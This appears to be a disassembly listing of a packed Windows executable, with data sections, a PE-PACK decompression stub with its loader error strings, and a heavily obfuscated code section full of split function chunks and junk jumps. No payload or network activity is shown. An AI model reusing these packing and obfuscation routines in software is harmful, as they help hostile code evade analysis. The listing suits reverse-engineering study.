dword_41E2D8 dd 14B1B0h, 0FFFFFFFFh, 4 dup(0) ; DATA XREF: sub_40938F+1A�o
; sub_4095A4+6�o ...
dword_41E2F0 dd 0 ; DATA XREF: sub_40938F+3�w
; sub_4095A4+11�r ...
align 8
dword_41E2F8 dd 953B20h ; DATA XREF: sub_40938F+15�w
; sub_4095A4+57�r ...
dword_41E2FC dd 0 ; DATA XREF: sub_409CB1+6�r
; .text:00409E35�w ...
dword_41E300 dd 0 ; DATA XREF: .text:00409E0F�w
; .text:00409E14�r ...
dword_41E304 dd 0 ; DATA XREF: sub_409CB1+F6�r
; .text:00409E61�w ...
dword_41E308 dd 0 ; DATA XREF: sub_409CB1+B9�r
; .text:00409E4B�w ...
align 10h
byte_41E310 db 0 ; DATA XREF: .text:00409DF9�r
; .text:00409E66�w
align 4
dd 101h dup(0)
byte_41E718 db 0 ; DATA XREF: sub_40CF2F+4B�o
; sub_40CF2F+5E�o ...
align 4
dd 5Fh dup(0)
dword_41E898 dd 40h dup(0) ; DATA XREF: sub_40CF2F+E�o
; sub_40CF2F+A6�o ...
dword_41E998 dd 3 dup(0) ; DATA XREF: sub_40CF2F+23�o
; sub_40CF2F+36�o ...
dword_41E9A4 dd 0 ; DATA XREF: sub_40CF25+3�r
; sub_40D366+15�r ...
dd 0
dword_41E9AC dd 0 ; DATA XREF: sub_40E618+49�w
; sub_40E618:loc_40E66D�w
byte_41E9B0 db 0 ; DATA XREF: sub_40E979+1D�w
; sub_40E979+46�w ...
align 4
dd 9 dup(0)
dd 3E000000h, 3F000000h, 37363534h, 3B3A3938h, 3D3Ch, 0
dd 2010000h, 6050403h, 0A090807h, 0E0D0C0Bh, 1211100Fh
dd 16151413h, 191817h, 0
db 0
db 1Ah, 1Bh, 1Ch
db 1Dh
db 1Eh, 1Fh, 20h
a_0123 db '!"#$%&',27h,'()*+,-./0123',0
dd 22h dup(0)
byte_41EAB4 db 8Bh ; DATA XREF: sub_40ECEB+29�o
; sub_40ECEB+35�o ...
db 0B9h, 0DBh, 0B0h
dd 8FB3E9B3h, 9A9790C8h, 62FBBADBh, 0
dword_41EAC8 dd 353B9991h, 29C9A16Fh, 0F3E975C5h, 37BBFFA3h, 0
; DATA XREF: sub_40ED6E+29�o
; sub_40ED6E+35�o ...
dword_41EADC dd 2B5DD82Eh ; DATA XREF: sub_4102AE+1D�o
; sub_410318+7�w ...
dword_41EAE0 dd 65BFB695h ; DATA XREF: sub_4102AE+2D�o
; sub_410318+11�w ...
dword_41EAE4 dd 13D9C0EAh ; DATA XREF: sub_4102AE+3D�o
; sub_410318+1B�w ...
dword_41EAE8 dd 0C48F84Bh ; DATA XREF: sub_4102AE+4D�o
; sub_410318+25�w ...
align 10h
byte_41EAF0 db 0E2h ; DATA XREF: sub_41055F+29�o
; sub_41055F+35�o ...
db 0E6h, 0B7h, 0B0h
dd 0BECEFA9Dh, 0D3DE90C8h, 0B1F7D5FBh, 2 dup(0)
dword_41EB08 dd 2 dup(0) ; DATA XREF: .text:00411923�o
dword_41EB10 dd 0 ; DATA XREF: .text:0041231C�o
dword_41EB14 dd 2 dup(0) ; DATA XREF: .text:0041233E�o
dword_41EB1C dd 0 ; DATA XREF: sub_4127D0+9�r
; sub_4127D0+16�w
dword_41EB20 dd 0 ; DATA XREF: sub_4127D0+BF�w
; sub_4127D0:loc_4128A0�r
dword_41EB24 dd 2 dup(0) ; DATA XREF: sub_412D4C+3�o
; .text:00412E83�o
aPacked_exe db 'packed.exe',0 ; DATA XREF: sub_406E8E+208�o
; sub_407148+172�o ...
align 4
dd 3Eh dup(0)
dword_41EC30 dd 46010F23h ; DATA XREF: sub_40A9CF+838�r
; .text:00416909�w
dword_41EC34 dd 39C12B45h ; DATA XREF: .text:00416913�w
dword_41EC38 dd 0D6C921BFh ; DATA XREF: .text:0041691D�w
dword_41EC3C dd 85825AAFh ; DATA XREF: .text:00416927�w
aPacked_exe_0 db 'packed.exe',0 ; DATA XREF: sub_40A9CF+C3D�o
; sub_40A9CF+C51�o ...
align 4
dd 3Fh dup(0)
dword_41ED48 dd 40h dup(0) ; DATA XREF: sub_40A9CF+1082�o
; sub_40A9CF+108E�o ...
byte_41EE48 db 0 ; DATA XREF: sub_40D043+FF�r
; sub_40D043+10A�o ...
align 4
dd 1Fh dup(0)
byte_41EEC8 db 0 ; DATA XREF: .text:loc_403F07�r
; .text:00403F12�o ...
align 4
dd 1Fh dup(0)
dword_41EF48 dd 40h dup(0) ; DATA XREF: sub_404279+36�o
; .text:00405D2B�o ...
byte_41F048 db 0 ; DATA XREF: sub_40A9CF+1F37�o
; sub_40D043:loc_40D0D6�r ...
align 1000h
_data ends
; Section 4. (virtual address 00020000)
; Virtual size : 00003000 ( 12288.)
; Section size in file : 00003000 ( 12288.)
; Offset to raw data for section: 00020000
; Flags C0000040: Data Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure data
; Segment permissions: Read/Write
PEPACK__ segment para public 'DATA' use32
assume cs:PEPACK__
;org 420000h
dword_420000 dd 0E860h, 835D0000h, 0BD8006EDh, 53Eh, 48840F01h, 0C6000002h
; DATA XREF: PEPACK__:00420514�o
dd 53E85h, 0C58B0100h, 54B852Bh, 0AD890000h, 514h, 58B8589h
dd 858B0000h, 58Bh, 56F8503h, 85890000h, 543h, 53CBD80h
dd 75010000h, 679D8B1Ch, 3000005h, 58B9Dh, 679D8900h, 8B000005h
dd 73858703h, 89000005h, 68046A03h, 1000h, 55FB5FFh, 6A0000h
dd 49FE8h, 0FC00B00h, 24584h, 63858900h, 8B000005h, 55BB5h
dd 0ADF50300h, 840FC00Bh, 81h, 0BD03F88Bh, 58Bh, 0ADC88BADh
dd 0E774C00Bh, 0F78B5756h, 563BD8Bh, 0A4F30000h, 0FF57575Fh
dd 563B5h, 289E800h, 0C4830000h, 0E8835F08h, 52C93305h
dd 0F8D23353h, 74483873h, 66337835h, 80391C8Bh, 0F74E8FBh
dd 74E9FB80h, 0FB81660Ah, 0F7425FFh, 29E3EB41h, 8301394Ch
dd 0E88305C1h, 29D7EB04h, 83023954h, 0EA8306C1h, 5E88304h
dd 85C6C8EBh, 0D3h, 5E5A5BF8h, 0FFFF76E9h, 0FF046AFFh
dd 55FB5h, 63B5FF00h, 0E8000005h, 3F2h, 53CBD80h, 75010000h
dd 679D8B0Eh, 8B000005h, 57385h, 8B038900h, 54385h, 3F858900h
dd 8B000005h, 54395h, 3F952B00h, 3000005h, 58B95h, 47958900h
dd 8B000005h, 56BB5h, 74F60B00h, 8BB50333h, 83000005h
dd 958B10C6h, 543h, 587952Bh, 0D20B0000h, 60E80574h, 8B000001h
dd 58B95h, 8F952B00h, 0B000005h, 0E80574D2h, 14Bh, 58B8D8Bh
dd 958B0000h, 543h, 0B0C428Bh, 0A0840FC0h, 89000000h, 85030C4Ah
dd 547h, 50505152h, 5538589h, 0D88B0000h, 34FE8h, 5A595B00h
dd 1275C00Bh, 0E8535152h, 346h, 840FC00Bh, 82h, 85895A59h
dd 239h, 0A89328Bh, 89107A8Bh, 0F60B104Ah, 0F78B0275h
dd 547B503h, 0BD030000h, 547h, 0C00B068Bh, 0E893D74h, 0B70F0579h
dd 30DEBC0h, 54785h, 0C76600h, 40400000h, 57565250h, 50505351h
dd 12000068h, 2F2E877h, 0B5B0000h, 5B4D74C0h, 7895F59h
dd 835B5A5Eh, 0C78304C6h, 83BDEB04h, 55E914C2h, 8BFFFFFFh
dd 55785h, 8B850300h, 89000005h, 611C2444h, 858DE0FFh
dd 5CEh, 0D1BD8D50h, 53000004h, 95FF5057h, 5B9h, 580CC483h
dd 49D9D8Dh, 44EB0000h, 4F6BD8Dh, 0C3F70000h, 0FFFF0000h
dd 0BD8D0674h, 4E3h, 5CE858Dh, 0FF500000h, 553B5h, 50575300h
dd 5B995FFh, 0C4830000h, 9D8D5810h, 49Dh, 858D0EEBh, 4B7h
dd 4879D8Dh, 0EB0000h, 0FF6AFF6Ah, 5AD958Bh, 8D8B0000h
dd 5B5h, 306AED33h, 6A5053h, 0ADE1FF52h, 5674C00Bh, 9D03D88Bh
dd 58Bh, 88AC1301h, 0B60FFF56h, 74C00AC0h, 74013C41h, 74023C0Eh
dd 74033C11h, 1D80310h, 66E3EB13h, 0C0B70FADh, 0EBADF3EBh
dd 0B60FACF0h, 74C90AC8h, 1F98007h, 0AEB0974h, 0B70FAD66h
dd 0AD03EBC8h, 0FACC88Bh, 0D803C0B6h, 0FAE21301h
db 0EBh, 0B4h, 0C3h
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
pusha
push ebp
mov esi, [ebp+8]
mov edi, [ebp+0Ch]
cld
mov dl, 80h
loc_42035D: ; CODE XREF: PEPACK__:loc_42036C�j
mov al, [esi]
inc esi
mov [edi], al
inc edi
loc_420363: ; CODE XREF: PEPACK__:004203C1�j
; PEPACK__:00420406�j ...
add dl, dl
jnz short loc_42036C
mov dl, [esi]
inc esi
adc dl, dl
loc_42036C: ; CODE XREF: PEPACK__:00420365�j
jnb short loc_42035D
add dl, dl
jnz short loc_420377
mov dl, [esi]
inc esi
adc dl, dl
loc_420377: ; CODE XREF: PEPACK__:00420370�j
jnb short loc_4203C3
xor eax, eax
add dl, dl
jnz short loc_420384
mov dl, [esi]
inc esi
adc dl, dl
loc_420384: ; CODE XREF: PEPACK__:0042037D�j
jnb loc_420460
add dl, dl
jnz short loc_420393
mov dl, [esi]
inc esi
adc dl, dl
loc_420393: ; CODE XREF: PEPACK__:0042038C�j
adc eax, eax
add dl, dl
jnz short loc_42039E
mov dl, [esi]
inc esi
adc dl, dl
loc_42039E: ; CODE XREF: PEPACK__:00420397�j
adc eax, eax
add dl, dl
jnz short loc_4203A9
mov dl, [esi]
inc esi
adc dl, dl
loc_4203A9: ; CODE XREF: PEPACK__:004203A2�j
adc eax, eax
add dl, dl
jnz short loc_4203B4
mov dl, [esi]
inc esi
adc dl, dl
loc_4203B4: ; CODE XREF: PEPACK__:004203AD�j
adc eax, eax
jz short loc_4203BE
push edi
sub edi, eax
mov al, [edi]
pop edi
loc_4203BE: ; CODE XREF: PEPACK__:004203B6�j
mov [edi], al
inc edi
jmp short loc_420363
; ---------------------------------------------------------------------------
loc_4203C3: ; CODE XREF: PEPACK__:loc_420377�j
mov eax, 1
loc_4203C8: ; CODE XREF: PEPACK__:loc_4203DC�j
add dl, dl
jnz short loc_4203D1
mov dl, [esi]
inc esi
adc dl, dl
loc_4203D1: ; CODE XREF: PEPACK__:004203CA�j
adc eax, eax
add dl, dl
jnz short loc_4203DC
mov dl, [esi]
inc esi
adc dl, dl
loc_4203DC: ; CODE XREF: PEPACK__:004203D5�j
jb short loc_4203C8
sub eax, 2
jnz short loc_42040B
mov ecx, 1
loc_4203E8: ; CODE XREF: PEPACK__:loc_4203FC�j
add dl, dl
jnz short loc_4203F1
mov dl, [esi]
inc esi
adc dl, dl
loc_4203F1: ; CODE XREF: PEPACK__:004203EA�j
adc ecx, ecx
add dl, dl
jnz short loc_4203FC
mov dl, [esi]
inc esi
adc dl, dl
loc_4203FC: ; CODE XREF: PEPACK__:004203F5�j
jb short loc_4203E8
push esi
mov esi, edi
sub esi, ebp
rep movsb
pop esi
jmp loc_420363
; ---------------------------------------------------------------------------
loc_42040B: ; CODE XREF: PEPACK__:004203E1�j
dec eax
shl eax, 8
mov al, [esi]
inc esi
mov ebp, eax
mov ecx, 1
loc_420419: ; CODE XREF: PEPACK__:loc_42042D�j
add dl, dl
jnz short loc_420422
mov dl, [esi]
inc esi
adc dl, dl
loc_420422: ; CODE XREF: PEPACK__:0042041B�j
adc ecx, ecx
add dl, dl
jnz short loc_42042D
mov dl, [esi]
inc esi
adc dl, dl
loc_42042D: ; CODE XREF: PEPACK__:00420426�j
jb short loc_420419
cmp eax, 7D00h
jnb short loc_420450
cmp eax, 500h
jb short loc_42044B
inc ecx
push esi
mov esi, edi
sub esi, eax
rep movsb
pop esi
jmp loc_420363
; ---------------------------------------------------------------------------
loc_42044B: ; CODE XREF: PEPACK__:0042043B�j
cmp eax, 7Fh
ja short loc_420453
loc_420450: ; CODE XREF: PEPACK__:00420434�j
add ecx, 2
loc_420453: ; CODE XREF: PEPACK__:0042044E�j
push esi
mov esi, edi
sub esi, eax
rep movsb
pop esi
jmp loc_420363
; ---------------------------------------------------------------------------
loc_420460: ; CODE XREF: PEPACK__:loc_420384�j
mov al, [esi]
inc esi
xor ecx, ecx
shr al, 1
jz short loc_42047C
adc ecx, 2
mov ebp, eax
push esi
mov esi, edi
sub esi, eax
rep movsb
pop esi
jmp loc_420363
; ---------------------------------------------------------------------------
loc_42047C: ; CODE XREF: PEPACK__:00420468�j
pop ebp
sub edi, [ebp+0Ch]
mov [ebp-4], edi
popa
pop ebp
retn
; ---------------------------------------------------------------------------
dw 5000h
aEPackMemoryAle db 'E-PACK: MEMORY ALERT',0
aPePackImportLd db 'PE-PACK: IMPORT LDR ERROR',0
aMemoryAllocati db 'Memory allocation failed!',0
aUnableToLoadS db 'Unable to load %s',0
aSNotFoundInS db '%s not found in %s',0
aOrdinal_4xhNot db 'Ordinal %.4Xh not found in %s',0
dd offset dword_420000
dd 0
dd 5A5A5FFh, 0A5FF0000h, 5A9h, 599A5FFh, 0A5FF0000h, 59Dh
dd 5A1A5FFh, 40000h, 0C8010000h, 0C8004173h, 4173h, 4000h
dd 200h, 3E000000h, 0F100417Eh, 0A0000167h, 0E7000006h
dd 15Fh, 12500h, 0
dd 0C8000000h, 173h, 0
dd 95000000h, 76000000h, 0A0000011h, 0C8000000h, 4173h
dd 2 dup(4000h), 0
dd 0E79F9300h, 0E805D877h, 0E7A5FD77h, 0E7980A77h, 0E79E3477h
dd 0E75CB577h, 77h, 0D6ADD700h, 0D4C96A77h, 77h, 52454B00h
dd 334C454Eh, 4C442E32h, 4Ch, 4D746547h, 6C75646Fh, 6E614865h
dd 41656C64h, 4C000000h, 4C64616Fh, 61726269h, 417972h
dd 65470000h, 6F725074h, 64644163h, 73736572h, 56000000h
dd 75747269h, 6C416C61h, 636F6Ch, 69560000h, 61757472h
dd 6572466Ch, 65h, 74697845h, 636F7250h, 737365h, 52455355h
dd 442E3233h, 4C4Ch, 73654D00h, 65676173h, 41786F42h, 77000000h
dd 69727073h, 4166746Eh, 100h, 80h, 0FFFFFF00h, 0FFh, 4 dup(0)
dd 205C1h, 20599h, 3 dup(0)
dd 2062Ch, 205B5h, 5 dup(0)
dd 1000h, 8990h, 1, 17000h, 6C5h, 1, 18000h, 26D9h, 1
dd 0
dd 0A0D0A0Dh, 0C4C40A0Dh, 0Dh dup(0C4C4C4C4h), 2D200A0Dh
dd 5020FE3Dh, 41502D45h, 76204B43h, 20302E31h, 202DFE2Dh
dd 20294328h, 79706F43h, 68676972h, 39312074h, 62203839h
dd 4E412079h, 4E694B41h, 2D3DFE20h, 0C40A0D20h, 0Dh dup(0C4C4C4C4h)
dd 0A0DC4h, 0A22h dup(0)
PEPACK__ ends
; ---------------------------------------------------------------------------
; Section 5. (virtual address 00023000)
; Virtual size : 0000C000 ( 49152.)
; Section size in file : 0000C000 ( 49152.)
; Offset to raw data for section: 00023000
; Flags E0000020: Text Executable Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Write/Execute
_0182ofla segment para public 'CODE' use32
assume cs:_0182ofla
;org 423000h
assume es:nothing, ss:nothing, ds:_data, fs:nothing, gs:nothing
sub edi, eax
jmp loc_426E65
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_133. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42660C
loc_423008: ; CODE XREF: sub_42660C:loc_425F4B�j
; _0182ofla:0042DE6A�j
xor ecx, eax
test esi, ebx
jmp loc_427E0E
; END OF FUNCTION CHUNK FOR sub_42660C
; ---------------------------------------------------------------------------
push ebx
pop edi
jmp sub_42A5FC
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42B15E
loc_423018: ; CODE XREF: sub_42B15E-5540�j
pop eax
add eax, 5DA72D8Eh
xor eax, 7A05D54Ah
js loc_427245
; END OF FUNCTION CHUNK FOR sub_42B15E
; START OF FUNCTION CHUNK FOR sub_424184
loc_42302B: ; CODE XREF: sub_424184:loc_424195�j
jmp loc_429908
; END OF FUNCTION CHUNK FOR sub_424184
; ---------------------------------------------------------------------------
mov ebp, ebx
jmp loc_427244
; ---------------------------------------------------------------------------
loc_423037: ; DATA XREF: _0182ofla:00426307�o
xchg edi, [esp]
jmp sub_42326C
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42448C
loc_42303F: ; CODE XREF: sub_42448C:loc_4297ED�j
; sub_42448C+5543�j
call nullsub_4
retn
; END OF FUNCTION CHUNK FOR sub_42448C
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423A2A
loc_423045: ; CODE XREF: sub_423A2A:loc_4283D7�j
call sub_423FCD
test al, al
jz loc_424C90
jmp loc_428E7C
; END OF FUNCTION CHUNK FOR sub_423A2A
; =============== S U B R O U T I N E =======================================
sub_423057 proc near ; DATA XREF: sub_42798F+1DD4�o
; FUNCTION CHUNK AT 00424893 SIZE 00000005 BYTES
mov eax, offset dword_42A3C8
call sub_42B14D
loc_423061: ; CODE XREF: sub_42798F:loc_42D90E�j
lea eax, [ebp-14h]
push eax
call sub_42DBF0
jmp loc_424893
sub_423057 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42306F proc near ; CODE XREF: sub_428D17�j
push ebp
mov ebp, esp
jmp sub_42D76D
sub_42306F endp
; =============== S U B R O U T I N E =======================================
sub_423077 proc near ; CODE XREF: _0182ofla:00425FD0�j
; _0182ofla:0042B1E3�p
xchg eax, [esp+0]
pop eax
xor edx, 0A32D65F9h
call sub_42A260
sub_423077 endp ; sp-analysis failed
; START OF FUNCTION CHUNK FOR sub_428F20
loc_423086: ; CODE XREF: sub_428F20+1C76�j
jmp loc_4285A8
; END OF FUNCTION CHUNK FOR sub_428F20
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42430D
loc_42308B: ; CODE XREF: sub_42430D+6251�j
jmp sub_427AD5
; END OF FUNCTION CHUNK FOR sub_42430D
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4254D3
loc_423090: ; CODE XREF: sub_4254D3+905�j
jmp loc_42CCB3
; END OF FUNCTION CHUNK FOR sub_4254D3
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42AC07
loc_423095: ; CODE XREF: sub_42AC07-3DE5�j
jz loc_427BB9
jmp loc_42C6E5
; END OF FUNCTION CHUNK FOR sub_42AC07
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_429BB9
loc_4230A0: ; CODE XREF: sub_429BB9+4FAB�j
mov edi, ebp
loc_4230A2: ; CODE XREF: sub_429BB9:loc_429BBE�j
call sub_424EBE
loc_4230A7: ; CODE XREF: _0182ofla:00429267�j
jmp nullsub_61
; END OF FUNCTION CHUNK FOR sub_429BB9
; =============== S U B R O U T I N E =======================================
sub_4230AC proc near ; CODE XREF: sub_42E395:loc_4274DE�p
; _0182ofla:0042E65D�j
mov [esp+0], edx
pop edx
call sub_4295D6
lea eax, [ebp-0Ch]
push offset loc_42B0E6
jmp nullsub_11
sub_4230AC endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_428F46
loc_4230C2: ; CODE XREF: sub_428F46:loc_4251EF�j
; _0182ofla:0042A93C�j
mov [ecx], edi
; END OF FUNCTION CHUNK FOR sub_428F46
; =============== S U B R O U T I N E =======================================
sub_4230C4 proc near ; CODE XREF: _0182ofla:0042A1BF�p
xchg esi, [esp+0]
loc_4230C7: ; CODE XREF: _0182ofla:00424389�j
pop esi
pop ecx
jmp loc_4278CC
sub_4230C4 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
sbb edi, 27386AAEh
jmp sub_428110
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_102. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
loc_4230DA: ; CODE XREF: _0182ofla:0042739D�j
jmp loc_42A56A
; ---------------------------------------------------------------------------
loc_4230DF: ; DATA XREF: sub_42C870:loc_42C874�o
lea eax, [ebp-70h]
push 87D7DAE2h
mov [esp], eax
call dword ptr [ebp-4]
jmp loc_427F10
; ---------------------------------------------------------------------------
mov edx, 0DE6CF580h
call sub_42D71D
push eax
ror eax, 0Fh
mov ds:dword_42D128, eax
retn
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4276BF
loc_423107: ; CODE XREF: sub_4276BF-2A94�j
jmp nullsub_196
; END OF FUNCTION CHUNK FOR sub_4276BF
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42310C proc near ; CODE XREF: sub_42C197�j
var_806 = byte ptr -806h
; FUNCTION CHUNK AT 004298C1 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042EA61 SIZE 0000001F BYTES
push ebp
mov ebp, esp
jmp loc_4298C1
sub_42310C endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_423114 proc near ; DATA XREF: _0182ofla:0042330B�o
; FUNCTION CHUNK AT 00423D3E SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004265E0 SIZE 00000018 BYTES
; FUNCTION CHUNK AT 0042DDB2 SIZE 00000006 BYTES
; FUNCTION CHUNK AT 0042DDB9 SIZE 0000000A BYTES
call sub_423FCD
test al, al
jz loc_42DDB9
jmp loc_423D3E
sub_423114 endp
; ---------------------------------------------------------------------------
loc_423126: ; CODE XREF: _0182ofla:0042569B�j
pushf
; =============== S U B R O U T I N E =======================================
sub_423127 proc near ; CODE XREF: sub_42798F+165�p
; FUNCTION CHUNK AT 00425215 SIZE 00000019 BYTES
; FUNCTION CHUNK AT 00425BD4 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004278C7 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004288C6 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 00428C5D SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042A9D3 SIZE 00000012 BYTES
; FUNCTION CHUNK AT 0042EC53 SIZE 00000008 BYTES
mov [esp+0], ebx
pop ebx
push esi
jmp loc_428C5D
sub_423127 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4282B8
loc_423131: ; CODE XREF: sub_4282B8-3231�j
xchg edi, ebp
and ecx, 0C166F425h
or esi, edi
push ebp
jmp loc_42C3F2
; END OF FUNCTION CHUNK FOR sub_4282B8
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_424E6E
loc_423141: ; CODE XREF: sub_424E6E:loc_42D1E8�j
mov ecx, esp
add ecx, 10h
mov ecx, [ecx]
mov dword ptr [ecx], 10013h
add ecx, 18h
mov al, [ecx]
add ecx, 9Ch
add [ecx], al
jmp loc_429B7C
; END OF FUNCTION CHUNK FOR sub_424E6E
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_223. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4298DD
loc_423167: ; CODE XREF: sub_4298DD+19EC�j
jmp loc_4268B3
; END OF FUNCTION CHUNK FOR sub_4298DD
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42D730
loc_42316C: ; CODE XREF: sub_42D730+1305�j
mov eax, [eax]
or eax, eax
jnz loc_426347
call sub_429BB9
mov edx, 0E996F72Eh
jmp sub_42AA44
; END OF FUNCTION CHUNK FOR sub_42D730
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42AC07
loc_423185: ; CODE XREF: sub_42AC07:loc_42C6E5�j
pop ecx
sbb ebp, ebx
cdq
sbb edi, ecx
jmp loc_42478A
; END OF FUNCTION CHUNK FOR sub_42AC07
; ---------------------------------------------------------------------------
dword_423190 dd 143958h ; DATA XREF: sub_4276BF:loc_4248F9�r
; sub_42798F-2DE6�r ...
dword_423194 dd 0DE58DDF9h ; DATA XREF: sub_4271D2-1941�w
; sub_4271D2:loc_429213�r ...
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423FCD
loc_423198: ; CODE XREF: sub_423FCD+3671�j
jmp loc_42A8A2
; END OF FUNCTION CHUNK FOR sub_423FCD
; ---------------------------------------------------------------------------
db 76h, 0DAh, 3Ch
dword_4231A0 dd 79D5B77Eh ; DATA XREF: sub_42940E+7�r
; sub_42AD20+7�w ...
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_425629
loc_4231A4: ; CODE XREF: sub_425629+8EC�j
jmp sub_4242AC
; END OF FUNCTION CHUNK FOR sub_425629
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4251FB
loc_4231A9: ; CODE XREF: sub_4251FB+F�j
jmp nullsub_19
; END OF FUNCTION CHUNK FOR sub_4251FB
; ---------------------------------------------------------------------------
dw 2141h
dword_4231B0 dd 6EEFCF58h ; DATA XREF: sub_42C379-1055�r
; sub_42D897�r
dd 0D28EDDF9h
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_428041
loc_4231B8: ; CODE XREF: sub_428041+3028�j
jmp sub_4256D3
; END OF FUNCTION CHUNK FOR sub_428041
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42660C
loc_4231BD: ; CODE XREF: sub_42660C-2C13�j
jmp loc_4260CB
; END OF FUNCTION CHUNK FOR sub_42660C
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42A241
loc_4231C2: ; CODE XREF: sub_42A241+13�j
push edx
push 831DB632h
pop edx
add edx, 7D248BA7h
jmp loc_427F08
; END OF FUNCTION CHUNK FOR sub_42A241
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_16. PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
sub_4231D5 proc near ; DATA XREF: sub_42C7FE-152F�o
arg_0 = dword ptr 4
; FUNCTION CHUNK AT 00425136 SIZE 00000012 BYTES
; FUNCTION CHUNK AT 00429E09 SIZE 0000001E BYTES
; FUNCTION CHUNK AT 00429FA3 SIZE 00000005 BYTES
mov eax, [ebp-18h]
shl eax, 2
cdq
add eax, [esp+0]
jno loc_429E09
adc edx, [esp+arg_0]
add esp, 8
mov eax, [eax]
jmp loc_429FA3
sub_4231D5 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_4231F3 proc near ; DATA XREF: sub_4231F3+B6A1�o
arg_0 = dword ptr 4
; FUNCTION CHUNK AT 00423209 SIZE 00000008 BYTES
; FUNCTION CHUNK AT 00423AC5 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 00424058 SIZE 00000006 BYTES
; FUNCTION CHUNK AT 00424940 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 00424A5F SIZE 00000011 BYTES
; FUNCTION CHUNK AT 00426588 SIZE 00000012 BYTES
; FUNCTION CHUNK AT 0042692A SIZE 00000016 BYTES
; FUNCTION CHUNK AT 00426DDC SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00427154 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00427DD1 SIZE 00000023 BYTES
; FUNCTION CHUNK AT 00428985 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042D510 SIZE 0000001E BYTES
; FUNCTION CHUNK AT 0042E46E SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0042E87F SIZE 0000001F BYTES
call sub_424065
jnz loc_42E87F
mov ecx, [ebx+edx-4]
or ecx, ecx
jmp loc_426911
sub_4231F3 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4231F3
loc_423209: ; CODE XREF: sub_4231F3:loc_42E87F�j
add edx, 14h
jmp loc_424A5F
; END OF FUNCTION CHUNK FOR sub_4231F3
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_428EB9
loc_423211: ; CODE XREF: sub_428EB9+17�j
mov eax, [ebp+8]
cmp dword ptr [eax-14h], 4
jnz loc_42E9E2
mov eax, [ebp+8]
cmp dword ptr [eax-4], 4
jnz loc_42E9E2
cmp dword ptr [ebp-10h], 0
jnz loc_429AFE
jmp loc_42BCFD
; END OF FUNCTION CHUNK FOR sub_428EB9
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_428265
loc_42323A: ; CODE XREF: sub_428265+11�j
call sub_429D1C
; END OF FUNCTION CHUNK FOR sub_428265
; START OF FUNCTION CHUNK FOR sub_423A2A
loc_42323F: ; CODE XREF: sub_423A2A+A169�j
jmp loc_42E48E
; END OF FUNCTION CHUNK FOR sub_423A2A
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4289E4
loc_423244: ; CODE XREF: sub_4289E4+1�j
jmp loc_4290BF
; END OF FUNCTION CHUNK FOR sub_4289E4
; =============== S U B R O U T I N E =======================================
sub_423249 proc near ; DATA XREF: sub_42C415:loc_424037�o
; FUNCTION CHUNK AT 0042C4DD SIZE 00000008 BYTES
; FUNCTION CHUNK AT 0042EC15 SIZE 00000005 BYTES
mov eax, [ebp-0Ch]
neg eax
sbb eax, eax
neg eax
jmp loc_42EC15
sub_423249 endp
; ---------------------------------------------------------------------------
jle loc_423F35
cmp ebx, edx
jmp loc_4277CA
; ---------------------------------------------------------------------------
loc_423264: ; DATA XREF: sub_42CA29:loc_426DFA�o
pop ecx
xchg ecx, [esp]
mov ebp, ecx
pop ecx
retn
; =============== S U B R O U T I N E =======================================
